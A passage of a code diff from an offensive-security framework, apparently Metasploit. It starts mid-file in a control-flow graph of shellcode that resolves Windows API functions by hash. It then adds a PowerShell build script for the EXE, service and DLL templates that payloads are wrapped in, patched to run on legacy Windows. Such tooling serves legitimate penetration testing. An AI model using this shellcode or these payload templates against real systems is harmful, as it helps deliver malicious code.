<node id="block.0x1048:instruction.0x104a">
|
||||
<data key="address">0x104a</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">743c</data>
|
||||
<data key="instruction.source">je 0x1085</data>
|
||||
<data key="instruction.hex">743a</data>
|
||||
<data key="instruction.source">je 0x1086</data>
|
||||
</node>
|
||||
<edge source="block.0x1045:instruction.0x1045" target="block.0x1045:instruction.0x1047"/>
|
||||
<edge source="block.0x1048:instruction.0x1048" target="block.0x1048:instruction.0x104a"/>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x1049">
|
||||
<data key="address">0x1049</data>
|
||||
<node id="block.0x104c">
|
||||
<data key="address">0x104c</data>
|
||||
<data key="type">block</data>
|
||||
<graph edgedefault="directed">
|
||||
<data key="address">0x1049</data>
|
||||
<data key="address">0x104c</data>
|
||||
<data key="type">block</data>
|
||||
<node id="block.0x1049:instruction.0x1049">
|
||||
<data key="address">0x1049</data>
|
||||
<node id="block.0x104c:instruction.0x104c">
|
||||
<data key="address">0x104c</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">49</data>
|
||||
<data key="instruction.source">dec ecx</data>
|
||||
</node>
|
||||
<node id="block.0x1049:instruction.0x104a">
|
||||
<data key="address">0x104a</data>
|
||||
<node id="block.0x104c:instruction.0x104d">
|
||||
<data key="address">0x104d</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">8b348b</data>
|
||||
<data key="instruction.source">mov esi, dword ptr [ebx + ecx*4]</data>
|
||||
</node>
|
||||
<node id="block.0x1049:instruction.0x104d">
|
||||
<data key="address">0x104d</data>
|
||||
<node id="block.0x104c:instruction.0x1050">
|
||||
<data key="address">0x1050</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">01d6</data>
|
||||
<data key="instruction.source">add esi, edx</data>
|
||||
</node>
|
||||
<node id="block.0x1049:instruction.0x104f">
|
||||
<data key="address">0x104f</data>
|
||||
<node id="block.0x104c:instruction.0x1052">
|
||||
<data key="address">0x1052</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">31ff</data>
|
||||
<data key="instruction.source">xor edi, edi</data>
|
||||
<data key="instruction.hex">8b7df8</data>
|
||||
<data key="instruction.source">mov edi, dword ptr [ebp - 8]</data>
|
||||
</node>
|
||||
<edge source="block.0x1049:instruction.0x1049" target="block.0x1049:instruction.0x104d"/>
|
||||
<edge source="block.0x1049:instruction.0x1049" target="block.0x1049:instruction.0x104a"/>
|
||||
<edge source="block.0x1049:instruction.0x104a" target="block.0x1049:instruction.0x104d"/>
|
||||
<edge source="block.0x104c:instruction.0x104c" target="block.0x104c:instruction.0x1050"/>
|
||||
<edge source="block.0x104c:instruction.0x104c" target="block.0x104c:instruction.0x104d"/>
|
||||
<edge source="block.0x104c:instruction.0x104d" target="block.0x104c:instruction.0x1050"/>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x1051">
|
||||
<data key="address">0x1051</data>
|
||||
<node id="block.0x1055">
|
||||
<data key="address">0x1055</data>
|
||||
<data key="type">block</data>
|
||||
<graph edgedefault="directed">
|
||||
<data key="address">0x1051</data>
|
||||
<data key="address">0x1055</data>
|
||||
<data key="type">block</data>
|
||||
<node id="block.0x1051:instruction.0x1051">
|
||||
<data key="address">0x1051</data>
|
||||
<node id="block.0x1055:instruction.0x1055">
|
||||
<data key="address">0x1055</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">31c0</data>
|
||||
<data key="instruction.source">xor eax, eax</data>
|
||||
</node>
|
||||
<node id="block.0x1051:instruction.0x1053">
|
||||
<data key="address">0x1053</data>
|
||||
<node id="block.0x1055:instruction.0x1057">
|
||||
<data key="address">0x1057</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">ac</data>
|
||||
<data key="instruction.source">lodsb al, byte ptr [esi]</data>
|
||||
</node>
|
||||
<node id="block.0x1051:instruction.0x1054">
|
||||
<data key="address">0x1054</data>
|
||||
<node id="block.0x1055:instruction.0x1058">
|
||||
<data key="address">0x1058</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">c1cf0d</data>
|
||||
<data key="instruction.source">ror edi, 0xd</data>
|
||||
</node>
|
||||
<node id="block.0x1051:instruction.0x1057">
|
||||
<data key="address">0x1057</data>
|
||||
<node id="block.0x1055:instruction.0x105b">
|
||||
<data key="address">0x105b</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">01c7</data>
|
||||
<data key="instruction.source">add edi, eax</data>
|
||||
</node>
|
||||
<node id="block.0x1051:instruction.0x1059">
|
||||
<data key="address">0x1059</data>
|
||||
<node id="block.0x1055:instruction.0x105d">
|
||||
<data key="address">0x105d</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">38e0</data>
|
||||
<data key="instruction.source">cmp al, ah</data>
|
||||
</node>
|
||||
<node id="block.0x1051:instruction.0x105b">
|
||||
<data key="address">0x105b</data>
|
||||
<node id="block.0x1055:instruction.0x105f">
|
||||
<data key="address">0x105f</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">75f4</data>
|
||||
<data key="instruction.source">jne 0x1051</data>
|
||||
<data key="instruction.source">jne 0x1055</data>
|
||||
</node>
|
||||
<edge source="block.0x1051:instruction.0x1051" target="block.0x1051:instruction.0x1053"/>
|
||||
<edge source="block.0x1051:instruction.0x1051" target="block.0x1051:instruction.0x1054"/>
|
||||
<edge source="block.0x1051:instruction.0x1051" target="block.0x1051:instruction.0x1059"/>
|
||||
<edge source="block.0x1051:instruction.0x1053" target="block.0x1051:instruction.0x1057"/>
|
||||
<edge source="block.0x1051:instruction.0x1053" target="block.0x1051:instruction.0x1059"/>
|
||||
<edge source="block.0x1051:instruction.0x1054" target="block.0x1051:instruction.0x1057"/>
|
||||
<edge source="block.0x1051:instruction.0x1057" target="block.0x1051:instruction.0x1059"/>
|
||||
<edge source="block.0x1051:instruction.0x1059" target="block.0x1051:instruction.0x105b"/>
|
||||
<edge source="block.0x1055:instruction.0x1055" target="block.0x1055:instruction.0x1057"/>
|
||||
<edge source="block.0x1055:instruction.0x1055" target="block.0x1055:instruction.0x1058"/>
|
||||
<edge source="block.0x1055:instruction.0x1055" target="block.0x1055:instruction.0x105d"/>
|
||||
<edge source="block.0x1055:instruction.0x1057" target="block.0x1055:instruction.0x105b"/>
|
||||
<edge source="block.0x1055:instruction.0x1057" target="block.0x1055:instruction.0x105d"/>
|
||||
<edge source="block.0x1055:instruction.0x1058" target="block.0x1055:instruction.0x105b"/>
|
||||
<edge source="block.0x1055:instruction.0x105b" target="block.0x1055:instruction.0x105d"/>
|
||||
<edge source="block.0x1055:instruction.0x105d" target="block.0x1055:instruction.0x105f"/>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x105d">
|
||||
<data key="address">0x105d</data>
|
||||
<node id="block.0x1061">
|
||||
<data key="address">0x1061</data>
|
||||
<data key="type">block</data>
|
||||
<graph edgedefault="directed">
|
||||
<data key="address">0x105d</data>
|
||||
<data key="address">0x1061</data>
|
||||
<data key="type">block</data>
|
||||
<node id="block.0x105d:instruction.0x105d">
|
||||
<data key="address">0x105d</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">037df8</data>
|
||||
<data key="instruction.source">add edi, dword ptr [ebp - 8]</data>
|
||||
</node>
|
||||
<node id="block.0x105d:instruction.0x1060">
|
||||
<data key="address">0x1060</data>
|
||||
<node id="block.0x1061:instruction.0x1061">
|
||||
<data key="address">0x1061</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">3b7d24</data>
|
||||
<data key="instruction.source">cmp edi, dword ptr [ebp + 0x24]</data>
|
||||
</node>
|
||||
<node id="block.0x105d:instruction.0x1063">
|
||||
<data key="address">0x1063</data>
|
||||
<node id="block.0x1061:instruction.0x1064">
|
||||
<data key="address">0x1064</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">75e0</data>
|
||||
<data key="instruction.source">jne 0x1045</data>
|
||||
<data key="instruction.hex">75e2</data>
|
||||
<data key="instruction.source">jne 0x1048</data>
|
||||
</node>
|
||||
<edge source="block.0x105d:instruction.0x105d" target="block.0x105d:instruction.0x1060"/>
|
||||
<edge source="block.0x105d:instruction.0x1060" target="block.0x105d:instruction.0x1063"/>
|
||||
<edge source="block.0x1061:instruction.0x1061" target="block.0x1061:instruction.0x1064"/>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x1065">
|
||||
<data key="address">0x1065</data>
|
||||
<node id="block.0x1066">
|
||||
<data key="address">0x1066</data>
|
||||
<data key="type">block</data>
|
||||
<graph edgedefault="directed">
|
||||
<data key="address">0x1065</data>
|
||||
<data key="address">0x1066</data>
|
||||
<data key="type">block</data>
|
||||
<node id="block.0x1065:instruction.0x1065">
|
||||
<data key="address">0x1065</data>
|
||||
<node id="block.0x1066:instruction.0x1066">
|
||||
<data key="address">0x1066</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">58</data>
|
||||
<data key="instruction.source">pop eax</data>
|
||||
</node>
|
||||
<node id="block.0x1065:instruction.0x1066">
|
||||
<data key="address">0x1066</data>
|
||||
<node id="block.0x1066:instruction.0x1067">
|
||||
<data key="address">0x1067</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">8b5824</data>
|
||||
<data key="instruction.source">mov ebx, dword ptr [eax + 0x24]</data>
|
||||
</node>
|
||||
<node id="block.0x1065:instruction.0x1069">
|
||||
<data key="address">0x1069</data>
|
||||
<node id="block.0x1066:instruction.0x106a">
|
||||
<data key="address">0x106a</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">01d3</data>
|
||||
<data key="instruction.source">add ebx, edx</data>
|
||||
</node>
|
||||
<node id="block.0x1065:instruction.0x106b">
|
||||
<data key="address">0x106b</data>
|
||||
<node id="block.0x1066:instruction.0x106c">
|
||||
<data key="address">0x106c</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">668b0c4b</data>
|
||||
<data key="instruction.source">mov cx, word ptr [ebx + ecx*2]</data>
|
||||
</node>
|
||||
<node id="block.0x1065:instruction.0x106f">
|
||||
<data key="address">0x106f</data>
|
||||
<node id="block.0x1066:instruction.0x1070">
|
||||
<data key="address">0x1070</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">8b581c</data>
|
||||
<data key="instruction.source">mov ebx, dword ptr [eax + 0x1c]</data>
|
||||
</node>
|
||||
<node id="block.0x1065:instruction.0x1072">
|
||||
<data key="address">0x1072</data>
|
||||
<node id="block.0x1066:instruction.0x1073">
|
||||
<data key="address">0x1073</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">01d3</data>
|
||||
<data key="instruction.source">add ebx, edx</data>
|
||||
</node>
|
||||
<node id="block.0x1065:instruction.0x1074">
|
||||
<data key="address">0x1074</data>
|
||||
<node id="block.0x1066:instruction.0x1075">
|
||||
<data key="address">0x1075</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">8b048b</data>
|
||||
<data key="instruction.source">mov eax, dword ptr [ebx + ecx*4]</data>
|
||||
</node>
|
||||
<node id="block.0x1065:instruction.0x1077">
|
||||
<data key="address">0x1077</data>
|
||||
<node id="block.0x1066:instruction.0x1078">
|
||||
<data key="address">0x1078</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">01d0</data>
|
||||
<data key="instruction.source">add eax, edx</data>
|
||||
</node>
|
||||
<node id="block.0x1065:instruction.0x1079">
|
||||
<data key="address">0x1079</data>
|
||||
<node id="block.0x1066:instruction.0x107a">
|
||||
<data key="address">0x107a</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">89442424</data>
|
||||
<data key="instruction.source">mov dword ptr [esp + 0x24], eax</data>
|
||||
</node>
|
||||
<node id="block.0x1065:instruction.0x107d">
|
||||
<data key="address">0x107d</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">5b</data>
|
||||
<data key="instruction.source">pop ebx</data>
|
||||
</node>
|
||||
<node id="block.0x1065:instruction.0x107e">
|
||||
<node id="block.0x1066:instruction.0x107e">
|
||||
<data key="address">0x107e</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">5b</data>
|
||||
<data key="instruction.source">pop ebx</data>
|
||||
</node>
|
||||
<node id="block.0x1065:instruction.0x107f">
|
||||
<node id="block.0x1066:instruction.0x107f">
|
||||
<data key="address">0x107f</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">5b</data>
|
||||
<data key="instruction.source">pop ebx</data>
|
||||
</node>
|
||||
<node id="block.0x1066:instruction.0x1080">
|
||||
<data key="address">0x1080</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">61</data>
|
||||
<data key="instruction.source">popal</data>
|
||||
</node>
|
||||
<node id="block.0x1065:instruction.0x1080">
|
||||
<data key="address">0x1080</data>
|
||||
<node id="block.0x1066:instruction.0x1081">
|
||||
<data key="address">0x1081</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">59</data>
|
||||
<data key="instruction.source">pop ecx</data>
|
||||
</node>
|
||||
<node id="block.0x1065:instruction.0x1081">
|
||||
<data key="address">0x1081</data>
|
||||
<node id="block.0x1066:instruction.0x1082">
|
||||
<data key="address">0x1082</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">5a</data>
|
||||
<data key="instruction.source">pop edx</data>
|
||||
</node>
|
||||
<node id="block.0x1065:instruction.0x1082">
|
||||
<data key="address">0x1082</data>
|
||||
<node id="block.0x1066:instruction.0x1083">
|
||||
<data key="address">0x1083</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">51</data>
|
||||
<data key="instruction.source">push ecx</data>
|
||||
</node>
|
||||
<node id="block.0x1065:instruction.0x1083">
|
||||
<data key="address">0x1083</data>
|
||||
<node id="block.0x1066:instruction.0x1084">
|
||||
<data key="address">0x1084</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">ffe0</data>
|
||||
<data key="instruction.source">jmp eax</data>
|
||||
</node>
|
||||
<edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x107d"/>
|
||||
<edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x1066"/>
|
||||
<edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x106f"/>
|
||||
<edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x1079"/>
|
||||
<edge source="block.0x1065:instruction.0x1066" target="block.0x1065:instruction.0x1074"/>
|
||||
<edge source="block.0x1065:instruction.0x1066" target="block.0x1065:instruction.0x1069"/>
|
||||
<edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x106f"/>
|
||||
<edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x107f"/>
|
||||
<edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x106b"/>
|
||||
<edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x1074"/>
|
||||
<edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x106f"/>
|
||||
<edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x107f"/>
|
||||
<edge source="block.0x1065:instruction.0x106f" target="block.0x1065:instruction.0x1074"/>
|
||||
<edge source="block.0x1065:instruction.0x106f" target="block.0x1065:instruction.0x1072"/>
|
||||
<edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x107d"/>
|
||||
<edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x1074"/>
|
||||
<edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x107f"/>
|
||||
<edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x107d"/>
|
||||
<edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x107f"/>
|
||||
<edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x1077"/>
|
||||
<edge source="block.0x1065:instruction.0x1077" target="block.0x1065:instruction.0x107f"/>
|
||||
<edge source="block.0x1065:instruction.0x1077" target="block.0x1065:instruction.0x1079"/>
|
||||
<edge source="block.0x1065:instruction.0x1079" target="block.0x1065:instruction.0x107d"/>
|
||||
<edge source="block.0x1065:instruction.0x1079" target="block.0x1065:instruction.0x107f"/>
|
||||
<edge source="block.0x1065:instruction.0x107d" target="block.0x1065:instruction.0x107e"/>
|
||||
<edge source="block.0x1065:instruction.0x107e" target="block.0x1065:instruction.0x107f"/>
|
||||
<edge source="block.0x1065:instruction.0x107f" target="block.0x1065:instruction.0x1080"/>
|
||||
<edge source="block.0x1065:instruction.0x107f" target="block.0x1065:instruction.0x1083"/>
|
||||
<edge source="block.0x1065:instruction.0x1080" target="block.0x1065:instruction.0x1081"/>
|
||||
<edge source="block.0x1065:instruction.0x1080" target="block.0x1065:instruction.0x1082"/>
|
||||
<edge source="block.0x1065:instruction.0x1081" target="block.0x1065:instruction.0x1082"/>
|
||||
<edge source="block.0x1065:instruction.0x1082" target="block.0x1065:instruction.0x1083"/>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x1085">
|
||||
<data key="address">0x1085</data>
|
||||
<data key="type">block</data>
|
||||
<graph edgedefault="directed">
|
||||
<data key="address">0x1085</data>
|
||||
<data key="type">block</data>
|
||||
<node id="block.0x1085:instruction.0x1085">
|
||||
<data key="address">0x1085</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">58</data>
|
||||
<data key="instruction.source">pop eax</data>
|
||||
</node>
|
||||
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x107e"/>
|
||||
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1067"/>
|
||||
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1070"/>
|
||||
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x107a"/>
|
||||
<edge source="block.0x1066:instruction.0x1067" target="block.0x1066:instruction.0x1075"/>
|
||||
<edge source="block.0x1066:instruction.0x1067" target="block.0x1066:instruction.0x106a"/>
|
||||
<edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x1070"/>
|
||||
<edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x1080"/>
|
||||
<edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x106c"/>
|
||||
<edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1075"/>
|
||||
<edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1070"/>
|
||||
<edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1080"/>
|
||||
<edge source="block.0x1066:instruction.0x1070" target="block.0x1066:instruction.0x1075"/>
|
||||
<edge source="block.0x1066:instruction.0x1070" target="block.0x1066:instruction.0x1073"/>
|
||||
<edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x107e"/>
|
||||
<edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x1075"/>
|
||||
<edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x1080"/>
|
||||
<edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x107e"/>
|
||||
<edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x1080"/>
|
||||
<edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x1078"/>
|
||||
<edge source="block.0x1066:instruction.0x1078" target="block.0x1066:instruction.0x1080"/>
|
||||
<edge source="block.0x1066:instruction.0x1078" target="block.0x1066:instruction.0x107a"/>
|
||||
<edge source="block.0x1066:instruction.0x107a" target="block.0x1066:instruction.0x107e"/>
|
||||
<edge source="block.0x1066:instruction.0x107a" target="block.0x1066:instruction.0x1080"/>
|
||||
<edge source="block.0x1066:instruction.0x107e" target="block.0x1066:instruction.0x107f"/>
|
||||
<edge source="block.0x1066:instruction.0x107f" target="block.0x1066:instruction.0x1080"/>
|
||||
<edge source="block.0x1066:instruction.0x1080" target="block.0x1066:instruction.0x1081"/>
|
||||
<edge source="block.0x1066:instruction.0x1080" target="block.0x1066:instruction.0x1084"/>
|
||||
<edge source="block.0x1066:instruction.0x1081" target="block.0x1066:instruction.0x1082"/>
|
||||
<edge source="block.0x1066:instruction.0x1081" target="block.0x1066:instruction.0x1083"/>
|
||||
<edge source="block.0x1066:instruction.0x1082" target="block.0x1066:instruction.0x1083"/>
|
||||
<edge source="block.0x1066:instruction.0x1083" target="block.0x1066:instruction.0x1084"/>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x1086">
|
||||
@@ -566,44 +545,58 @@
|
||||
<node id="block.0x1086:instruction.0x1086">
|
||||
<data key="address">0x1086</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">58</data>
|
||||
<data key="instruction.source">pop eax</data>
|
||||
</node>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x1087">
|
||||
<data key="address">0x1087</data>
|
||||
<data key="type">block</data>
|
||||
<graph edgedefault="directed">
|
||||
<data key="address">0x1087</data>
|
||||
<data key="type">block</data>
|
||||
<node id="block.0x1087:instruction.0x1087">
|
||||
<data key="address">0x1087</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">5f</data>
|
||||
<data key="instruction.source">pop edi</data>
|
||||
</node>
|
||||
<node id="block.0x1086:instruction.0x1087">
|
||||
<data key="address">0x1087</data>
|
||||
<node id="block.0x1087:instruction.0x1088">
|
||||
<data key="address">0x1088</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">5a</data>
|
||||
<data key="instruction.source">pop edx</data>
|
||||
</node>
|
||||
<node id="block.0x1086:instruction.0x1088">
|
||||
<data key="address">0x1088</data>
|
||||
<node id="block.0x1087:instruction.0x1089">
|
||||
<data key="address">0x1089</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">8b12</data>
|
||||
<data key="instruction.source">mov edx, dword ptr [edx]</data>
|
||||
</node>
|
||||
<node id="block.0x1086:instruction.0x108a">
|
||||
<data key="address">0x108a</data>
|
||||
<node id="block.0x1087:instruction.0x108b">
|
||||
<data key="address">0x108b</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">eb83</data>
|
||||
<data key="instruction.hex">eb82</data>
|
||||
<data key="instruction.source">jmp 0x100f</data>
|
||||
</node>
|
||||
<edge source="block.0x1086:instruction.0x1086" target="block.0x1086:instruction.0x1087"/>
|
||||
<edge source="block.0x1086:instruction.0x1087" target="block.0x1086:instruction.0x1088"/>
|
||||
<edge source="block.0x1086:instruction.0x1088" target="block.0x1086:instruction.0x108a"/>
|
||||
<edge source="block.0x1087:instruction.0x1087" target="block.0x1087:instruction.0x1088"/>
|
||||
<edge source="block.0x1087:instruction.0x1088" target="block.0x1087:instruction.0x1089"/>
|
||||
<edge source="block.0x1087:instruction.0x1089" target="block.0x1087:instruction.0x108b"/>
|
||||
</graph>
|
||||
</node>
|
||||
<edge source="block.0x1000" target="block.0x100f"/>
|
||||
<edge source="block.0x100f" target="block.0x1018"/>
|
||||
<edge source="block.0x1018" target="block.0x101f"/>
|
||||
<edge source="block.0x101f" target="block.0x1021"/>
|
||||
<edge source="block.0x1021" target="block.0x1029"/>
|
||||
<edge source="block.0x1029" target="block.0x103a"/>
|
||||
<edge source="block.0x103a" target="block.0x1045"/>
|
||||
<edge source="block.0x1045" target="block.0x1049"/>
|
||||
<edge source="block.0x1049" target="block.0x1051"/>
|
||||
<edge source="block.0x1051" target="block.0x105d"/>
|
||||
<edge source="block.0x105d" target="block.0x1065"/>
|
||||
<edge source="block.0x1065" target="block.0x1085"/>
|
||||
<edge source="block.0x1085" target="block.0x1086"/>
|
||||
<edge source="block.0x100f" target="block.0x101b"/>
|
||||
<edge source="block.0x101b" target="block.0x1022"/>
|
||||
<edge source="block.0x1022" target="block.0x1024"/>
|
||||
<edge source="block.0x1024" target="block.0x102c"/>
|
||||
<edge source="block.0x102c" target="block.0x103d"/>
|
||||
<edge source="block.0x103d" target="block.0x1048"/>
|
||||
<edge source="block.0x1048" target="block.0x104c"/>
|
||||
<edge source="block.0x104c" target="block.0x1055"/>
|
||||
<edge source="block.0x1055" target="block.0x1061"/>
|
||||
<edge source="block.0x1061" target="block.0x1066"/>
|
||||
<edge source="block.0x1066" target="block.0x1086"/>
|
||||
<edge source="block.0x1086" target="block.0x1087"/>
|
||||
</graph>
|
||||
</graphml>
|
||||
|
||||
@@ -88,5 +88,7 @@ strtab:
|
||||
db 0
|
||||
db 0
|
||||
strtabsz equ $ - strtab
|
||||
|
||||
align 4
|
||||
global _start
|
||||
_start:
|
||||
|
||||
@@ -94,5 +94,6 @@ strtab:
|
||||
db 0
|
||||
strtabsz equ $ - strtab
|
||||
|
||||
align 4
|
||||
global _start
|
||||
_start:
|
||||
|
||||
@@ -2,9 +2,18 @@
|
||||
This directory contains the source code for the PE executable templates.
|
||||
|
||||
## Building
|
||||
Use the provided `build_all.bat` file, and run it from within the Visual Studio
|
||||
developer console. The batch file requires that the `%VCINSTALLDIR%` environment
|
||||
variable be defined (which it should be by default). The build script will
|
||||
create both the x86 and x64 templates before moving them into the correct
|
||||
folder. The current working directory when the build is run must be the source
|
||||
code directory (`pe`).
|
||||
Use the provided `build_all.ps1` script from within the Visual Studio developer
|
||||
console. The script requires that the `%VCINSTALLDIR%` environment variable be
|
||||
defined (which it should be by default). By default it builds all templates for
|
||||
both x86 and x64, then moves the outputs into the correct folder.
|
||||
|
||||
```powershell
|
||||
# build everything
|
||||
.\build_all.ps1
|
||||
|
||||
# build only x86
|
||||
.\build_all.ps1 -Architectures x86
|
||||
|
||||
# build only EXE templates
|
||||
.\build_all.ps1 -Templates exe,exe_service
|
||||
```
|
||||
|
||||
@@ -1,17 +0,0 @@
|
||||
@echo off
|
||||
|
||||
echo Compiling DLLs
|
||||
|
||||
for /D %%d in (dll*) do (
|
||||
pushd "%%d"
|
||||
call build.bat
|
||||
popd
|
||||
)
|
||||
|
||||
echo Compiling EXEs
|
||||
|
||||
for /D %%e in (exe*) do (
|
||||
pushd "%%e"
|
||||
call build.bat
|
||||
popd
|
||||
)
|
||||
@@ -0,0 +1,230 @@
|
||||
<#
|
||||
.SYNOPSIS
|
||||
Build all PE executable and DLL templates for Metasploit.
|
||||
|
||||
.DESCRIPTION
|
||||
Compiles x86 and x64 variants of the EXE, service EXE, DLL, GDI+ DLL, and
|
||||
mixed-mode DLL templates using the MSVC toolchain. After linking, the EXE
|
||||
templates are patched to lower the minimum subsystem version so they can run
|
||||
on legacy Windows (NT 4.0+ for x86, Server 2003+ for x64). Modern MSVC
|
||||
linkers enforce a floor of 5.01/5.02 which is too high for those targets.
|
||||
|
||||
.PARAMETER Architectures
|
||||
Which architectures to build. Defaults to both x86 and x64.
|
||||
|
||||
.PARAMETER Templates
|
||||
Which templates to build. Defaults to all of them.
|
||||
|
||||
.EXAMPLE
|
||||
.\build_all.ps1
|
||||
.\build_all.ps1 -Architectures x86
|
||||
.\build_all.ps1 -Templates exe,exe_service
|
||||
#>
|
||||
|
||||
param(
|
||||
[ValidateSet('x86', 'x64')]
|
||||
[string[]]$Architectures = @('x86', 'x64'),
|
||||
|
||||
[ValidateSet('exe', 'exe_service', 'dll', 'dll_gdiplus', 'dll_mixed_mode')]
|
||||
[string[]]$Templates = @('exe', 'exe_service', 'dll', 'dll_gdiplus', 'dll_mixed_mode')
|
||||
)
|
||||
|
||||
$ErrorActionPreference = 'Stop'
|
||||
$ScriptDir = Split-Path -Parent $MyInvocation.MyCommand.Path
|
||||
$OutputDir = Resolve-Path (Join-Path $ScriptDir '..\..')
|
||||
|
||||
# Each entry defines only what varies per template. The build function handles
|
||||
# the common logic: calling cl, optional 256KiB variant, PE version patching.
|
||||
#
|
||||
# Dir - subdirectory containing the source
|
||||
# OutputFmt - output filename format string, {0} is replaced with the architecture
|
||||
# Source - source file passed to cl
|
||||
# ClFlags - flags passed to cl (before /link)
|
||||
# LinkLibs - libraries passed to the linker (after /link)
|
||||
# LinkRes - optional .res file to link
|
||||
# EntryPoint - /entry value
|
||||
# NoDefaultLib - if set, pass /NODEFAULTLIB to the linker
|
||||
# RcArgs - optional resource compiler arguments (run before cl)
|
||||
# PatchVersion - if set, patch the PE subsystem version after linking
|
||||
#
|
||||
# DLL templates automatically get a 256KiB payload variant built alongside the
|
||||
# standard size. This is determined by the output extension, not a per-template flag.
|
||||
$BuildDefs = [ordered]@{
|
||||
exe = @{
|
||||
Dir = 'exe'
|
||||
OutputFmt = 'template_{0}_windows.exe'
|
||||
Source = 'template.c'
|
||||
ClFlags = @('/GS-')
|
||||
LinkLibs = @('kernel32.lib')
|
||||
EntryPoint = 'main'
|
||||
NoDefaultLib = $true
|
||||
PatchVersion = $true
|
||||
}
|
||||
exe_service = @{
|
||||
Dir = 'exe_service'
|
||||
OutputFmt = 'template_{0}_windows_svc.exe'
|
||||
Source = 'template.c'
|
||||
ClFlags = @('/GS-', '/DBUILDMODE=2')
|
||||
LinkLibs = @('advapi32.lib', 'kernel32.lib')
|
||||
EntryPoint = 'main'
|
||||
NoDefaultLib = $true
|
||||
PatchVersion = $true
|
||||
}
|
||||
dll = @{
|
||||
Dir = 'dll'
|
||||
OutputFmt = 'template_{0}_windows.dll'
|
||||
Source = 'template.c'
|
||||
ClFlags = @('/LD', '/GS-', '/DBUILDMODE=2')
|
||||
LinkLibs = @('kernel32.lib')
|
||||
LinkRes = 'template.res'
|
||||
EntryPoint = 'DllMain'
|
||||
RcArgs = @('/v', 'template.rc')
|
||||
}
|
||||
